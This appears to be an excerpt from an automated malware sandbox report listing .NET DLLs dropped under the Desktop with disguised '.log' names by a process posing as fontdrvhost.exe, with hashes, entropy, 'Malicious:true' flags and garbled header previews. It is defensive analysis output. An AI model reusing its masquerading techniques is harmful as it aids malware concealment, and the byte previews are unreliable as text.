                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                  C:\Users\user\Desktop\QpCXcuuA.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.660491370279985
                                                                  Encrypted:false
                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\RCCOzYeY.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38912
                                                                  Entropy (8bit):5.679286635687991
                                                                  Encrypted:false
                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\RMCoLrQk.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.932541123129161
                                                                  Encrypted:false
                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                  C:\Users\user\Desktop\RMaOjKxV.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):5.541771649974822
                                                                  Encrypted:false
                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\RMfXVWDe.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):40448
                                                                  Entropy (8bit):5.7028690200758465
                                                                  Encrypted:false
                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\RRcFiATg.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):342528
                                                                  Entropy (8bit):6.170134230759619
                                                                  Encrypted:false
                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\RnzHiPIs.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):85504
                                                                  Entropy (8bit):5.8769270258874755
                                                                  Encrypted:false
                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                  C:\Users\user\Desktop\RraOLYZw.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):70144
                                                                  Entropy (8bit):5.909536568846014
                                                                  Encrypted:false
                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\SKewgrff.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34816
                                                                  Entropy (8bit):5.636032516496583
                                                                  Encrypted:false
                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\SbqYhYfr.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):85504
                                                                  Entropy (8bit):5.8769270258874755
                                                                  Encrypted:false
                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                  C:\Users\user\Desktop\SdGfOIqy.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32256
                                                                  Entropy (8bit):5.631194486392901
                                                                  Encrypted:false
                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\TCIWpNeY.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34816
                                                                  Entropy (8bit):5.636032516496583
                                                                  Encrypted:false
                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\THFECrua.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):294912
                                                                  Entropy (8bit):6.010605469502259
                                                                  Encrypted:false
                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                  C:\Users\user\Desktop\TORFqFIZ.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):64000
                                                                  Entropy (8bit):5.857602289000348
                                                                  Encrypted:false
                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\TWBYVoif.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):85504
                                                                  Entropy (8bit):5.8769270258874755
                                                                  Encrypted:false
                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                  C:\Users\user\Desktop\TYRgCYum.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34304
                                                                  Entropy (8bit):5.618776214605176
                                                                  Encrypted:false
                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\TlbPEPXm.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34304
                                                                  Entropy (8bit):5.618776214605176
                                                                  Encrypted:false
                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\ULtOMFWU.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):5.541771649974822
                                                                  Encrypted:false
                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\UOaorzbP.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.629584586954759
                                                                  Encrypted:false
                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\UbSwNisy.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.660491370279985
                                                                  Encrypted:false
                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

